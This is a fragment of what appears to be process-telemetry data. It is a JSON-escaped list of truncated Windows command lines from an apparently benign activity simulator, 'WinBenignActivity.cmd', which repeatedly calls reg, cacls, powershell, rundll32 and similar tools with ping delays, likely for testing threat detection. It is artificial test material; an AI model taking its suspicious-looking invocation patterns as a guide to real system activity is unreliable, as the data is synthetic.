\\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -6735 ...\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"rundll32 \\\\26415\\\\9105.exe\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"ping 127.0.0.1 -n 14 \",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -17484...\",\"ping 127.0.0.1 -n 14 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 14 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping 127.0.0.1 -n 14 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 14 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 14 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 14 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 14 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping 127.0.0.1 -n 14 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 14 \",\"rundll32 \\\\15840\\\\26443.exe\",\"ping 127.0.0.1 -n 14 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping 127.0.0.1 -n 14 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 14 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping 127.0.0.1 -n 14 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 19 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 23 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 14 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 18 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 28 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\di...\",\"ping 127.0.0.1 -n 14 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 17 \",\"rundll32 \\\\18091\\\\18975.exe\",\"ping 127.0.0.1 -n 26 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd c...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"ping 127.0.0.1 -n 26 \",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -1926 ...\",\"ping 127.0.0.1 -n 26 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -10353...\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"rundll32 \\\\29395\\\\14699.exe\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 26 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 26 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 26 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping 127.0.0.1 -n 26 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 26 \",\"rundll32 \\\\24535\\\\23154.exe\",\"ping 127.0.0.1 -n 26 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"ping 127.0.0.1 -n 26 \",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -29592...\",\"ping 127.0.0.1 -n 26 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping 127.0.0.1 -n 26 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 26 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 26 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping 127.0.0.1 -n 26 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 26 \",\"rundll32 \\\\12420\\\\28156.exe\",\"ping 127.0.0.1 -n 26 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping 127.0.0.1 -n 26 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 26 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping 127.0.0.1 -n 26 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 26 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 26 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping 127.0.0.1 -n 26 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 29 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 8 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\di...\",\"ping 127.0.0.1 -n 19 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinB...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"ping 127.0.0.1 -n 6 \",\"reg c:\\\\diagnostics\\\\WinBenignActivity.cmd -14404 /...\",\"ping 127.0.0.1 -n 25 \",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinB...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"ping 127.0.0.1 -n 8 \",\"reg c:\\\\diagnostics\\\\WinBenignActivity.cmd -23146 /...\",\"ping 127.0.0.1 -n 9 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 3 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd -...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -20009...\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"rundll32 \\\\6038\\\\18193.exe\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 11 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 29 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 20 \",\"ping 127.0.0.1 -n 22 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 2 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\di...\",\"ping 127.0.0.1 -n 2 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\system32\\\\appidcertstorecheck.exe\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"taskhostw.exe\",\"C:\\\\Windows\\\\system32\\\\AppHostRegistrationVerifier.ex...\",\"C:\\\\Windows\\\\system32\\\\usoclient.exe StartScan\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinB...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"ping 127.0.0.1 -n 11 \",\"reg c:\\\\diagnostics\\\\WinBenignActivity.cmd -29451 /...\",\"ping 127.0.0.1 -n 18 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 19 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd -...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -32357...\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"rundll32 \\\\557\\\\12356.exe\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 14 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 30 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 16 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 26 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 12 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\di...\",\"ping 127.0.0.1 -n 6 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 1 \",\"rundll32 \\\\28294\\\\1236.exe\",\"ping 127.0.0.1 -n 24 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd c...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"ping 127.0.0.1 -n 24 \",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -21672...\",\"ping 127.0.0.1 -n 24 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 24 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -9125 ...\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"rundll32 \\\\24845\\\\2750.exe\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 24 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 24 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 24 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 24 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 24 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping 127.0.0.1 -n 24 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 24 \",\"rundll32 \\\\32641\\\\32360.exe\",\"ping 127.0.0.1 -n 24 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping 127.0.0.1 -n 24 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 24 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping 127.0.0.1 -n 24 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 11 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 20 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\di...\",\"ping 127.0.0.1 -n 11 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"C:\\\\Windows\\\\system32\\\\devicecensus.exe\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"C:\\\\Windows\\\\system32\\\\devicecensus.exe UserCxt\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\system32\\\\compattelrunner.exe\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platfor...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\System32\\\\wsqmcons.exe\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"taskhostw.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinB...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"ping 127.0.0.1 -n 13 \",\"reg c:\\\\diagnostics\\\\WinBenignActivity.cmd -15216 /...\",\"ping 127.0.0.1 -n 19 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 5 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd -...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -30962...\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"rundll32 \\\\28790\\\\506.exe\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 8 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 3 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 17 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 2 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 29 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\di...\",\"ping 127.0.0.1 -n 30 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 17 \",\"rundll32 \\\\5728\\\\16265.exe\",\"ping 127.0.0.1 -n 22 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd c...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"ping 127.0.0.1 -n 22 \",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -9528 ...\",\"ping 127.0.0.1 -n 22 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 22 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping 127.0.0.1 -n 22 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 22 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 22 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 22 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 22 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping 127.0.0.1 -n 22 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 22 \",\"rundll32 \\\\5914\\\\3172.exe\",\"ping 127.0.0.1 -n 22 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping 127.0.0.1 -n 22 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 22 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping 127.0.0.1 -n 22 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 25 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 32 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\di...\",\"ping 127.0.0.1 -n 2 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"taskhostw.exe\",\"C:\\\\Windows\\\\system32\\\\appidcertstorecheck.exe\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinB...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"ping 127.0.0.1 -n 16 \",\"reg c:\\\\diagnostics\\\\WinBenignActivity.cmd -981 /74...\",\"ping 127.0.0.1 -n 20 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 24 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd -...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -1796 ...\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"rundll32 \\\\25124\\\\21095.exe\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 3 \",\"cscript 